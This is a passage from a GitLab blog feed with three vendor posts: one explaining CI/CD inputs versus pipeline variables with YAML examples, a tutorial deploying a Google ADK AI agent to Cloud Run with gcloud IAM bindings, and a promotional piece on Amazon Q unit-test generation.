<p><strong>Runtime mutability</strong></p>
<p>Variables can be modified throughout the pipeline runtime, creating unpredictable behavior when multiple jobs attempt to change the same values. For example, deploy_job_a sets <code>DEPLOY_ENV=staging</code>, but deploy_job_b changes the <code>DEPLOY_ENV</code> value to <code>production</code>.</p>
<p><strong>Security risks</strong></p>
<p>Security concerns arise because variables intended as simple parameters often receive the same access permissions as sensitive secrets. There's no clear contract defining what parameters a pipeline expects, their types, or their default values. A simple <code>BUILD_TYPE</code> parameter, that seems innocuous at first glance, suddenly has access to production secrets simply because variables do not inherently distinguish between parameters and sensitive data.</p>
<p>Perhaps most problematically, error detection happens too late in the process. A misconfigured variable might not cause a failure until minutes or even hours into a pipeline run, wasting valuable CI/CD resources and developer time. Teams have developed elaborate workarounds such as custom validation scripts, extensive documentation, and complex naming conventions just to make variable-based parameter passing somewhat reliable.</p>
<p>Many users have requested local debugging capabilities to test pipeline configurations before deployment. While this seems like an obvious solution, it quickly breaks down in practice. Enterprise CI/CD workflows integrate with dozens of external systems — cloud providers, artifact repositories, security scanners, deployment targets — that simply can't be replicated locally. Even if they could, the complexity would make local testing environments nearly impossible to maintain. This mismatch forced us to reframe the problem entirely. Instead of asking &quot;How can we test pipelines locally?&quot; we started asking &quot;How can we prevent configuration issues caused by variable-based parameter passing before users run a CI/CD automation workflow?&quot;</p>
<h2>Understanding variable precedence</h2>
<p>GitLab's variable system includes multiple <a href="https://docs.gitlab.com/ci/variables/#cicd-variable-precedence">precedence levels</a> to provide flexibility for different use cases. While this system serves many valid scenarios like allowing administrators to set instance- or group-wide defaults while letting individual projects override them when needed, it can create challenges when building reusable pipeline components.</p>
<p>When creating components or templates that will be used across different projects and groups, the variable precedence hierarchy can make behavior less predictable. For example, a template that works perfectly in one project might behave differently in another due to group- or instance-level variable overrides that aren't visible in a pipeline configuration.</p>
<p>When including multiple templates, it also can be challenging to track which variables are being set where and how they might interact.</p>
<p>In addition, components authors need to document not just what variables their template uses, but also potential conflicts with variables that might be defined at higher precedence levels.</p>
<h3>Variable precedence examples</h3>
<p><strong>Main pipeline file (<code>.gitlab-ci.yml</code>):</strong></p>
<pre><code class="language-yaml">
variables:
  ENVIRONMENT: production  # Top-level default for all jobs
  DATABASE_URL: prod-db.example.com

include:
  - local: 'templates/test-template.yml'
  - local: 'templates/deploy-template.yml'
</code></pre>
<p><strong>Test template (<code>templates/test-template.yml</code>):</strong></p>
<pre><code class="language-yaml">
run-tests:
  variables:
    ENVIRONMENT: test  # Job-level variable overrides the default
  script:
    - echo &quot;Running tests in $ENVIRONMENT environment&quot;  
    - echo &quot;Database URL is $DATABASE_URL&quot;  # Still inherits prod-db.example.com!
    - run-integration-tests --env=$ENVIRONMENT --db=$DATABASE_URL
    `# Issue: Tests run in &quot;test&quot; environment but against production database`

</code></pre>
<p><strong>Deploy template (<code>templates/deploy-template.yml</code>):</strong></p>
<pre><code class="language-yaml">
deploy-app:
  script:
    - echo &quot;Deploying to $ENVIRONMENT&quot;  # Uses production (top-level default)
    - echo &quot;Database URL is $DATABASE_URL&quot;  # Uses prod-db.example.com
    - deploy --target=$ENVIRONMENT --db=$DATABASE_URL
    # This will deploy to production as intended
</code></pre>
<p><strong>The challenges in this example:</strong></p>
<ol>
<li>
<p>Partial inheritance: The test job gets <code>ENVIRONMENT=test</code> but still inherits <code>DATABASE_URL=prod-db.example.com</code>.</p>
</li>
<li>
<p>Coordination complexity: Template authors must know what top-level variables exist and might conflict.</p>
</li>
<li>
<p>Override behavior: Job-level variables with the same name override defaults, but this isn't always obvious.</p>
</li>
<li>
<p>Hidden dependencies: Templates become dependent on the main pipeline's variable names.</p>
</li>
</ol>
<p>GitLab recognized these pain points and introduced <a href="https://docs.gitlab.com/ee/ci/inputs/">CI/CD inputs</a> as a purpose-built solution for passing parameters to pipelines, offering typed parameters with built-in validation that occurs at pipeline creation time rather than during execution.</p>
<h2>CI/CD inputs fundamentals</h2>
<p>Inputs provide typed parameters for reusable pipeline configuration with built-in validation at pipeline creation time, designed specifically for defining values when the pipeline runs. They create a clear contract between the pipeline consumer and the configuration, explicitly defining what parameters are expected, their types, and constraints.</p>
<h3>Configuration flexibility and scope</h3>
<p>One of the advantages of inputs is their configuration-time flexibility. Inputs are evaluated and interpolated during pipeline creation using the interpolation format <code>$[[ inputs.input-id ]]</code>, meaning they can be used anywhere in your pipeline configuration — including job names, rules conditions, images, and any other YAML configuration element. This eliminates the long-standing limitation of variable interpolation in certain contexts.</p>
<p>One common use case we've seen is that users define their job names like <code>test-$[[ inputs.environment ]]-deployment</code>.</p>
<p>When using inputs in job names, you can prevent naming conflicts when the same component is included multiple times in a single pipeline. Without this capability, including the same component twice would result in job name collisions, with the second inclusion overwriting the first. Input-based job names ensure each inclusion creates uniquely named jobs.</p>
<p><strong>Before inputs:</strong></p>
<pre><code class="language-yaml">
test-service:
  variables:
    SERVICE_NAME: auth-service
    ENVIRONMENT: staging
  script:
    - run-tests-for $SERVICE_NAME in $ENVIRONMENT
</code></pre>
<p><strong>With inputs:</strong></p>
<pre><code class="language-yaml">
spec:
  inputs:
    environment:
      type: string
    service_name:
      type: string

test-$[[ inputs.service_name ]]-$[[ inputs.environment ]]:
  script:
    - run-tests-for $[[ inputs.service_name ]] in $[[ inputs.environment ]]
</code></pre>
<p>When included multiple times with different inputs, this creates jobs like <code>test-auth-service-staging</code>, <code>test-payment-service-production</code>, and <code>test-notification-service-development</code>. Each job has a unique, meaningful name that clearly indicates its purpose, making pipeline visualization much clearer than having multiple jobs with identical names that would overwrite each other.</p>
<p>Now let's go back to the first example in the top of this blog and use inputs, one immediate benefit is that instead of maintaining multiple templates file we can use one reusable template with different input values:</p>
<pre><code class="language-yaml">
spec:
  inputs:
    environment:
      type: string
    database_url:
      type: string
    action:
      type: string
---

$[[ inputs.action ]]-$[[ inputs.environment ]]:
  script:
    - echo &quot;Running $[[ inputs.action ]] in $[[ inputs.environment ]] environment&quot;
    - echo &quot;Database URL is $[[ inputs.database_url ]]&quot;
    - run-$[[ inputs.action ]] --env=$[[ inputs.environment ]] --db=$[[ inputs.database_url ]]
</code></pre>
<p>And in the main <code>gitlab-ci.yml</code> file we can include it twice (or more) with different values, making sure we avoid naming collisions</p>
<pre><code class="language-yaml">
include:
  - local: 'templates/environment-template.yml'
    inputs:
      environment: test
      database_url: test-db.example.com
      action: tests
  - local: 'templates/environment-template.yml'
    inputs:
      environment: production
      database_url: prod-db.example.com
      action: deploy
</code></pre>
<p><strong>The result:</strong> Instead of maintaining separate YAML files for testing and deployment jobs, you now have a single reusable template that handles both use cases safely. This approach scales to any number of environments or job types — reducing maintenance overhead, eliminating code duplication, and ensuring consistency across your entire pipeline configuration. One template to maintain instead of many, with zero risk of variable collision or configuration drift.</p>
<h3>Validation and type safety</h3>
<p>Another key difference between variables and inputs lies in validation capabilities. Inputs support different value types, including strings, numbers, booleans, and arrays, with validation occurring immediately when the pipeline is created. If you define an input as a boolean but pass a string, GitLab will reject the pipeline before any jobs execute, saving time and resources.</p>
<p>Here is an example of the enormous benefit of type validation.</p>
<p><strong>Without type validation (variables):</strong></p>
<pre><code class="language-yaml">
variables:
  ENABLE_TESTS: &quot;true&quot;  # Always a string
  MAX_RETRIES: &quot;3&quot;      # Always a string

deploy_job:
  script:
    - if [ &quot;$ENABLE_TESTS&quot; = true ]; then  # This fails!
        echo &quot;Running tests&quot;
      fi
    - retry_count=$((MAX_RETRIES + 1))      # String concatenation: &quot;31&quot;

</code></pre>
<p><strong>Problem:</strong>  The boolean check fails because “<code>true</code>” (string) is not equal to <code>true</code>, (boolean).</p>
<p><strong>With type validation (inputs):</strong></p>
<pre><code class="language-yaml">
spec:
  inputs:
    enable_tests:
      type: boolean
      default: true
    max_retries:
      type: number
      default: 3

      
deploy_job:
  script:
    - if [ &quot;$[[ inputs.enable_tests ]]&quot; = true ]; then  # Works correctly
        echo &quot;Running tests&quot;
      fi
    - retry_count=$(($[[ inputs.max_retries ]] + 1))    # Math works: 4

</code></pre>
<p><strong>Real-world impact for variable type validation failure</strong>: A developer or a process triggers a GitLab CI/CD pipeline with <code>ENABLE_TESTS = yes</code> instead of <code>true</code>. Assuming it takes on average 30 minutes before the deployment job starts, then finally when this job kicks off, 30 minutes or longer into the pipeline run, the deployment script tries to evaluate the boolean and fails.</p>
<p>Imagine the impact in terms of time-to-market and, of course. developer time trying to debug why a seemingly basic deploy job failed.</p>
<p>With type inputs, GitLab CI/CD will immediately throw an error and provide an explicit error message regarding the type mismatch.</p>
<h3>Security and access control</h3>
<p>Inputs provide enhanced security through controlled parameter passing with explicit contracts that define exactly what values are expected and allowed, creating clear boundaries between parameter passing to the pipeline, In addition. inputs are immutable. Once the pipeline starts, they cannot be modified during execution, providing predictable behavior throughout the pipeline lifecycle and eliminating the security risks that come from runtime variable manipulation.</p>
<h3>Scope and lifecycle</h3>
<p>When you define variables using the <code>variables:</code> keyword at the top level of your <code>.gitlab-ci.yml</code> file, these variables become defaults for all jobs in your entire pipeline. When you include templates, you must consider what variables you've defined globally, as they can interact with the template's expected behavior through GitLab's variable precedence order.</p>
<p>Inputs are defined in CI configuration files (e.g. components or templates) and assigned values when a pipeline is triggered, allowing you to customize reusable CI configurations. They exist solely for pipeline creation and configuration time, scoped to the CI configuration file where they're defined, and become immutable references once the pipeline begins execution. Since each component maintains its own inputs, there is no risk of inputs interfering with other components or templates in your pipeline, eliminating variable collision and override issues that can occur with variable-based approaches.</p>
<h2>Working with variables and inputs together</h2>
<p>We recognize that teams have extensive investments in their variable-based workflows, and migration to inputs doesn't happen overnight. That's why we've developed capabilities that allow inputs and variables to work seamlessly together, providing a bridge between existing variables and the benefits of inputs while overcoming some key challenges in variable expansion.</p>
<p>Let's look at this real-world example.</p>
<p><strong>Variable expansion in rules conditions</strong></p>
<p>A common challenge occurs when using variables that contain other variable references in <code>rules:if</code> conditions. GitLab only expands variables one level deep during rule evaluation, which can lead to unexpected behavior:</p>
<pre><code class="language-yaml"># This doesn't work as expected

variables:
  TARGET_ENV:
    value: &quot;${CI_COMMIT_REF_SLUG}&quot;

deploy-job:
  rules:
    - if: '$TARGET_ENV == &quot;production&quot;'  # Compares &quot;${CI_COMMIT_REF_SLUG}&quot; != &quot;production&quot;
      variables:
        DEPLOY_MODE: &quot;blue-green&quot;
</code></pre>
<p>The <code>expand_vars</code> function solves this by forcing proper variable expansion in inputs:</p>
<pre><code class="language-yaml">spec:
  inputs:
    target_environment:
      description: &quot;Target deployment environment&quot;
      default: &quot;${CI_COMMIT_REF_SLUG}&quot;
---


deploy-job:
  rules:
    - if: '&quot;$[[ inputs.target_environment | expand_vars ]]&quot; == &quot;production&quot;'
      variables:
        DEPLOY_MODE: &quot;blue-green&quot;
        APPROVAL_REQUIRED: &quot;true&quot;
    - when: always
      variables:
        DEPLOY_MODE: &quot;rolling&quot;
        APPROVAL_REQUIRED: &quot;false&quot;
  script:
    - echo &quot;Target: $[[ inputs.target_environment | expand_vars ]]&quot;
    - echo &quot;Deploy mode: ${DEPLOY_MODE}&quot;
</code></pre>
<h3>Why this matters</h3>
<p>Without <code>expand_vars</code>, rule conditions evaluate against the literal variable reference (like <code>&quot;${CI_COMMIT_REF_SLUG}&quot;</code>) rather than the expanded value (like <code>&quot;production&quot;</code>). This leads to rules that never match when you expect them to, breaking conditional pipeline logic.</p>
<p><strong>Important notes about expand_vars:</strong></p>
<ul>
<li>
<p>Only variables that can be used with the include keyword are supported</p>
</li>
<li>
<p>Variables must be unmasked (not marked as protected/masked)</p>
</li>
<li>
<p>Nested variable expansion is not supported</p>
</li>
<li>
<p>Rule conditions using <code>expand_vars</code> must be properly quoted: <code>'&quot;$[[ inputs.name | expand_vars ]]&quot; == &quot;value&quot;'</code></p>
</li>
</ul>
<p>This pattern solves the single-level variable expansion limitation, working for any conditional logic that requires comparing fully resolved variable values.</p>
<h3>Function chaining for advanced processing</h3>
<p>Along with <code>expand_vars</code>, you can use functions like <code>truncate</code> to shorten values for compliance with naming restrictions (such as Kubernetes resource names), creating sophisticated parameter processing pipelines while maintaining input safety and predictability.</p>
<pre><code class="language-yaml">
spec:  
  inputs:
    service_identifier:
      default: 'service-$CI_PROJECT_NAME-$CI_COMMIT_REF_SLUG'
---

create-resource:
  script:
    - resource_name=$[[ inputs.service_identifier | expand_vars | truncate(0,50) ]]
</code></pre>
<p>This integration capability allows you to adopt inputs gradually while leveraging your existing variable infrastructure, making the migration path much smoother.</p>
<h3>From components only to CI pipelines</h3>
<p>Up until GitLab 17.11, GitLab users were able to use inputs only in components and templates through the <code>include:</code> syntax. This limited their use to reusable CI/CD configurations, but didn't address the broader need for dynamic pipeline customization.</p>
<h3>Pipeline-wide inputs support</h3>
<p>Starting with GitLab 17.11, GitLab users can now use inputs to safely modify pipeline behavior across all pipeline execution contexts, replacing the traditional reliance on pipeline variables. This expanded support includes:</p>
<ul>
<li>
<p>Scheduled pipelines: Define inputs with defaults for automated pipeline runs while allowing manual override when needed.</p>
</li>
<li>
<p>Downstream pipelines: Pass structured inputs to child and multi-project pipelines with proper validation and type safety.</p>
</li>
<li>
<p>Manual pipelines: Present users with a clean, validated form interface.</p>
</li>
</ul>
<p>Those enhancements, with more to follow, allow teams to modernize their pipelines while maintaining backward compatibility gradually. Once inputs are fully adopted, users can disable pipeline variables to ensures a more secure and predictable CI/CD environment.</p>
<h2>Summary</h2>
<p>The transition from variables to inputs represents more than just a technical upgrade — it's a shift toward more maintainable, predictable, and secure CI/CD pipelines. While variables continue to serve important purposes for configuration, inputs provide the parameter-passing capabilities that teams have been working around for years.</p>
<p>We understand that variables are deeply embedded in existing workflows, which is why we've built bridges between the two systems. The <code>expand_vars</code> function and other input capabilities allow you to adopt inputs gradually while leveraging your existing variable infrastructure.</p>
<p>By starting with new components and templates, then gradually migrating high-impact workflows, you'll quickly see the benefits of clearer contracts, earlier error detection, and more reliable automation that scales across your organization. Additionally, moving to inputs creates an excellent foundation for leveraging <a href="https://gitlab.com/explore/catalog">GitLab's CI/CD Catalog</a>, where reusable components with typed interfaces become powerful building blocks for your DevOps workflows but more on that in our next blog post.</p>
<p>Your future self and your teammates will thank you for the clarity and reliability that inputs bring to your CI/CD workflows, while still being able to work with the variable systems you've already invested in.</p>
<h2>What's next</h2>
<p>Looking ahead, we're expanding inputs to solve two key challenges: enhancing pipeline triggering with cascading options that <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/520094">dynamically adjust based on user selections</a>, and providing job-level inputs that allow users to <a href="https://gitlab.com/groups/gitlab-org/-/epics/17833">retry individual jobs with different parameter values</a>. We encourage you to follow these discussions, share your feedback, and contribute to shaping these features. You can also provide general feedback on CI/CD inputs through our <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/407556">feedback issue</a>.</p>
<h2>Read more</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/how-to-include-file-references-in-your-ci-cd-components/">How to include file references in your CI/CD components</a></li>
<li><a href="https://docs.gitlab.com/ci/inputs/">CI/CD inputs documentation</a></li>
<li><a href="https://about.gitlab.com/blog/ci-cd-catalog-goes-ga-no-more-building-pipelines-from-scratch/">CI/CD Catalog goes GA: No more building pipelines from scratch</a></li>
<li><a href="https://about.gitlab.com/blog/demystifying-ci-cd-variables/">GitLab environment variables demystified</a></li>
</ul>
]]></content>
        <author>
            <name>Dov Hershkovitch</name>
            <uri>https://about.gitlab.com/blog/authors/dov-hershkovitch</uri>
        </author>
        <published>2025-07-07T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Fast and secure AI agent deployment to Google Cloud with GitLab]]></title>
        <id>https://about.gitlab.com/blog/fast-and-secure-ai-agent-deployment-to-google-cloud-with-gitlab/</id>
        <link href="https://about.gitlab.com/blog/fast-and-secure-ai-agent-deployment-to-google-cloud-with-gitlab/"/>
        <updated>2025-07-07T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p><a href="https://about.gitlab.com/topics/agentic-ai/">Agentic AI</a> is transforming
how we build intelligent applications, but deploying AI agents securely and
efficiently can be challenging. In this tutorial, you'll learn how to deploy
an AI agent built with Google's Agent Development Kit
(<a href="https://cloud.google.com/vertex-ai/generative-ai/docs/agent-development-kit/quickstart">ADK</a>)
to Cloud Run using <a href="https://cloud.google.com/blog/topics/partners/understand-the-google-cloud-gitlab-integration">GitLab's native
integrations</a>
and <a href="https://docs.gitlab.com/ci/components/">CI/CD components</a>.</p>
<h2>What are AI agents and why do they matter?</h2>
<p>Agentic AI represents a significant evolution in artificial intelligence. Unlike traditional generative AI tools that require constant human direction, AI agents leverage advanced language models and natural language processing to take independent action. These systems can understand requests, make decisions, and execute multistep plans to achieve goals autonomously.</p>
<p>This tutorial uses Google's ADK, a flexible and modular framework for developing and deploying AI agents. While optimized for Gemini and the Google ecosystem, ADK is model-agnostic, deployment-agnostic, and built for compatibility with other frameworks.</p>
<h2>Our demo application: Canada City Advisor</h2>
<p>To demonstrate the deployment process, we'll work with a practical example: the Canada City Advisor. This AI agent helps users find their ideal Canadian city based on their preferences and constraints.</p>
<p>Here's how it works:</p>
<ul>
<li>
<p>Users input their budget requirements and lifestyle preferences.</p>
</li>
<li>
<p>The root agent coordinates two sub-agents:</p>
<ul>
<li>A budget analyzer agent that evaluates financial constraints. This draws data obtained from the Canada Mortgage and Housing Corporation.</li>
<li>A lifestyle preferences agent that matches cities to user needs. This includes a weather service that uses <a href="https://open-meteo.com/">Open-Meteo</a> to get the proper city information.</li>
</ul>
</li>
<li>
<p>The system generates personalized city recommendations</p>
</li>
</ul>
<p>This multi-agent architecture showcases the power of agentic AI - different specialized agents working together to solve a complex problem. The sub-agents are only invoked when the root agent determines that budget and lifestyle analysis are needed.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1751576568/obgxpxvlnxtzifddrrz1.png" alt="Multi-agent architecture to develop demo application with agentic AI"></p>
<h2>Prerequisites</h2>
<p>Before we begin, ensure you have:</p>
<ul>
<li>
<p>A Google Cloud project with the following APIs enabled:</p>
<ul>
<li>Cloud Run API</li>
<li>Artifact Registry API</li>
<li>Vertex AI API</li>
</ul>
</li>
<li>
<p>A GitLab project for your source code</p>
</li>
<li>
<p>Appropriate permissions in both GitLab and Google Cloud</p>
</li>
</ul>
<p><strong>Step 1: Set up IAM integration with Workload Identity Federation</strong></p>
<p>The first step establishes secure, keyless authentication between GitLab and Google Cloud using <a href="https://cloud.google.com/iam/docs/workload-identity-federation">Workload Identity Federation</a>. This eliminates the need for service account keys and improves security.</p>
<p>In your GitLab project:</p>
<ol>
<li>
<p>Navigate to <strong>Settings &gt; Integrations &gt; Google Cloud IAM.</strong></p>
</li>
<li>
<p>Provide the following information:</p>
<ul>
<li><strong>Project ID</strong>: Your Google Cloud project ID</li>
<li><strong>Project Number</strong>: Found in your Google Cloud console</li>
<li><strong>Pool ID</strong>: A unique identifier for your workload identity pool</li>
<li><strong>Provider ID</strong>: A unique identifier for your identity provider</li>
</ul>
</li>
</ol>
<p>GitLab will generate a script for you. Copy this script and run it in your Google Cloud Shell to create the Workload Identity Federation.</p>
<p><strong>Step 2: Configure Google Artifact Registry integration</strong></p>
<p>Next, we'll set up the connection to Google Artifact Registry where our container images will be stored.</p>
<ol>
<li>
<p>In GitLab, go to <strong>Settings &gt; Integrations &gt; Google Artifact Registry.</strong></p>
</li>
<li>
<p>Enter:</p>
<ul>
<li><strong>Google Cloud Project ID</strong>: Same as in Step 1</li>
<li><strong>Repository Name</strong>: Name of an existing Artifact Registry repository</li>
<li><strong>Location</strong>: The region where your repository is located</li>
</ul>
</li>
</ol>
<p><strong>Important</strong>: The repository must already exist in Artifact Registry. GitLab won't create a new one for you in this context.</p>
<p>GitLab will generate commands to set up the necessary permissions. Run these in Google Cloud Shell.</p>
<p>Additionally, add these roles to your service principal for Cloud Run deployment:</p>
<ul>
<li>
<p><code>roles/run.admin</code></p>
</li>
<li>
<p><code>roles/iam.serviceAccountUser</code></p>
</li>
<li>
<p><code>roles/cloudbuild.builds.editor</code></p>
</li>
</ul>
<p>You can add these roles using the following gcloud commands:</p>
<pre><code class="language-shell">
GCP_PROJECT_ID=&quot;&lt;your-project-id&gt;&quot; #replace

GCP_PROJECT_NUMBER=&quot;&lt;your-project-number&gt;&quot; #replace

GCP_WORKLOAD_IDENTITY_POOL=&quot;&lt;your-pool-id&gt;&quot; #replace


gcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \
  --member=&quot;principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true&quot; \
  --role='roles/run.admin'

gcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \
  --member=&quot;principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true&quot; \
  --role='roles/iam.serviceAccountUser'

gcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \
  --member=&quot;principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true&quot; \
  --role='roles/cloudbuild.builds.editor'
</code></pre>
<p><strong>Step 3: Create the CI/CD pipeline</strong></p>
<p>Now for the exciting part – let's build our deployment pipeline! GitLab's CI/CD components make this remarkably simple.</p>
<p>Create a <code>.gitlab-ci.yml</code> file in your project root:</p>
<pre><code class="language-unset">
stages:
  - build
  - test
  - upload
  - deploy

variables:
  GITLAB_IMAGE: $CI_REGISTRY_IMAGE/main:$CI_COMMIT_SHORT_SHA
  AR_IMAGE: $GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_LOCATION-docker.pkg.dev/$GOOGLE_ARTIFACT_REGISTRY_PROJECT_ID/$GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_NAME/main:$CI_COMMIT_SHORT_SHA

build:
  image: docker:24.0.5
  stage: build
  services:
    - docker:24.0.5-dind
  before_script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
  script:
    - docker build -t $GITLAB_IMAGE .
    - docker push $GITLAB_IMAGE

include:
  - template: Jobs/Dependency-Scanning.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Dependency-Scanning.gitlab-ci.yml
  - template: Jobs/SAST.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/SAST.gitlab-ci.yml
  - template: Jobs/Secret-Detection.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Secret-Detection.gitlab-ci.yml
  - component: gitlab.com/google-gitlab-components/artifact-registry/upload-artifact-registry@main
    inputs:
      stage: upload
      source: $GITLAB_IMAGE
      target: $AR_IMAGE
  - component: gitlab.com/google-gitlab-components/cloud-run/deploy-cloud-run@main
    inputs:
      stage: deploy
      project_id: &quot;&lt;your-project-id&gt;&quot; #replace
      service: &quot;canadian-city&quot;
      region: &quot;us-central1&quot;
      image: $AR_IMAGE
</code></pre>
<p>The pipeline consists of four stages:</p>
<ol>
<li>
<p><strong>Build</strong>: Creates the Docker container with your AI agent</p>
</li>
<li>
<p><strong>Test</strong>: Runs security scans (container scanning, dependency scanning, SAST)</p>
</li>
<li>
<p><strong>Upload</strong>: Pushes the container to Artifact Registry</p>
</li>
<li>
<p><strong>Deploy</strong>: Deploys to Cloud Run</p>
</li>
</ol>
<p>The great thing about using <a href="https://docs.gitlab.com/ci/components/">GitLab's CI/CD components</a> is that you only need to provide a few parameters - the components handle all the complex authentication and deployment logic.</p>
<p><strong>Step 4: Deploy and test</strong></p>
<p>With everything configured, it's time to deploy:</p>
<ol>
<li>
<p>Commit your code and <code>.gitlab-ci.yml</code> to your GitLab repository.</p>
</li>
<li>
<p>The pipeline will automatically trigger.</p>
</li>
<li>
<p>Monitor the pipeline progress in GitLab's CI/CD interface.</p>
</li>
<li>
<p>Once complete, find your Cloud Run URL in the Google Cloud Console.</p>
</li>
</ol>
<p>You'll see each stage execute:</p>
<ul>
<li>
<p>Build stage creates your container.</p>
</li>
<li>
<p>Test stage runs comprehensive security scans.</p>
</li>
<li>
<p>Upload stage pushes to Artifact Registry.</p>
</li>
<li>
<p>Deploy stage creates or updates your Cloud Run service.</p>
</li>
</ul>
<h2>Security benefits</h2>
<p>This approach provides several security advantages:</p>
<ul>
<li>
<p><strong>No long-lived credentials:</strong> Workload Identity Federation eliminates service account keys.</p>
</li>
<li>
<p><strong>Automated security scanning:</strong> Every deployment is scanned for vulnerabilities.</p>
</li>
<li>
<p><strong>Audit trail:</strong> Complete visibility of who deployed what and when.</p>
</li>
<li>
<p><strong>Principle of least privilege:</strong> Fine-grained IAM roles limit access.</p>
</li>
</ul>
<h2>Summary</h2>
<p>By combining GitLab's security features with Google Cloud's powerful AI and serverless platforms, you can deploy AI agents that are both secure and scalable. The integration between GitLab and Google Cloud eliminates much of the complexity traditionally associated with such deployments.</p>
<blockquote>
<p>Use this tutorial's <a href="https://gitlab.com/gitlab-partners-public/google-cloud/demos/ai-agent-deployment">complete code
example</a>
to get started now. Not a GitLab customer yet? Explore the DevSecOps platform with <a href="https://about.gitlab.com/free-trial/">a free trial</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Regnard Raquedan</name>
            <uri>https://about.gitlab.com/blog/authors/regnard-raquedan</uri>
        </author>
        <published>2025-07-07T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Enhance application quality with AI-powered test generation]]></title>
        <id>https://about.gitlab.com/blog/enhance-application-quality-with-ai-powered-test-generation/</id>
        <link href="https://about.gitlab.com/blog/enhance-application-quality-with-ai-powered-test-generation/"/>
        <updated>2025-07-03T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>You know how critical application quality is to your customers and reputation. However, ensuring that quality through comprehensive testing can feel like an uphill battle. You're dealing with time-consuming manual processes, inconsistent test coverage across your team, and those pesky issues that somehow slip through the cracks. It's frustrating when your rating drops because quality assurance becomes a bottleneck rather than a safeguard.</p>
<p>Here's where <a href="https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q </a>, which delivers agentic AI throughout the software development lifecycle for AWS customers, can help transform your QA process. This AI-powered capability can automatically generate comprehensive unit tests for your code, dramatically accelerating your quality assurance workflow. Instead of spending hours writing tests manually, you can let AI analyze your code and create tests that ensure optimal coverage and consistent quality across your entire application.</p>
<h2>How GitLab Duo with Amazon Q works</h2>
<p>So how does this work? Let's walk through the process together.
When you're working on a new feature, you start by selecting the Java class you've added to your project through a merge request. You simply navigate to your merge request and click on the &quot;Changes&quot; tab to see the new code you've added.</p>
<p>Next, you invoke Amazon Q by entering a quick action command. All you need to do is type <code>/q test</code> in the issue comment box. It's that simple – just a forward slash, the letter &quot;q&quot;, and the word &quot;test&quot;.</p>
<p>Once you hit enter, Amazon Q springs into action. It analyzes your selected code, understanding its structure, logic, and purpose. The AI examines your class methods, dependencies, and potential edge cases to determine what tests are needed.</p>
<p>Within moments, Amazon Q generates comprehensive unit test coverage for your new class. It creates tests that cover not just the happy path, but also edge cases and error conditions you might have overlooked. The generated tests follow your project's existing patterns and conventions, ensuring they integrate seamlessly with your codebase.</p>
<h2>Why use GitLab Duo with Amazon Q?</h2>
<p>Here's the bottom line: You started with a critical challenge – maintaining high-quality applications while dealing with time constraints and inconsistent testing practices. GitLab Duo with Amazon Q addresses this by automating the test generation process, ensuring optimal code coverage and consistent testing standards. The result? Issues are detected before deployment, your applications maintain their quality, and you can develop software faster without sacrificing reliability.</p>
<p>Key benefits of this feature:</p>
<ul>
<li>Significantly reduces time spent writing unit tests</li>
<li>Ensures comprehensive test coverage across your codebase</li>
<li>Maintains consistent testing quality across all team members</li>
<li>Catches issues before they reach production</li>
<li>Accelerates your overall development velocity</li>
</ul>
<p>Ready to see this game-changing feature in action? Watch how GitLab Duo with Amazon Q can transform your quality assurance process:</p>
<p>&lt;!-- blank line --&gt;</p>
<p>&lt;figure class=&quot;video_container&quot;&gt;
&lt;iframe src=&quot;https://www.youtube.com/embed/pxlYJVcHY28?si=MhIz6lnHxc6kFhlL&quot; frameborder=&quot;0&quot; allowfullscreen=&quot;true&quot;&gt; &lt;/iframe&gt;
&lt;/figure&gt;
&lt;!-- blank line --&gt;</p>
<h2>Get started with GitLab Duo with Amazon Q today</h2>
<p>Want to learn more about GitLab Duo with Amazon Q? Visit the <a href="https://about.gitlab.com/partners/technology-partners/aws/">GitLab and AWS partner page</a> for detailed information.</p>
<h2>Agentic AI resources</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/agentic-ai-guides-and-resources/">Agentic AI guides and resources</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/">What is agentic AI?</a></li>
<li><a href="https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q: Agentic AI optimized for AWS generally available</a></li>
<li><a href="https://docs.gitlab.com/user/duo_amazon_q/">GitLab Duo with Amazon Q documentation</a></li>
</ul>
]]></content>
        <author>
            <name>Cesar Saavedra</name>
            <uri>https://about.gitlab.com/blog/authors/cesar-saavedra</uri>
        </author>
        <published>2025-07-03T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Why now is the time for embedded DevSecOps]]></title>
        <id>https://about.gitlab.com/blog/why-now-is-the-time-for-embedded-devsecops/</id>
        <link href="https://about.gitlab.com/blog/why-now-is-the-time-for-embedded-devsecops/"/>
        <updated>2025-07-01T00:00:00.000Z</updated>
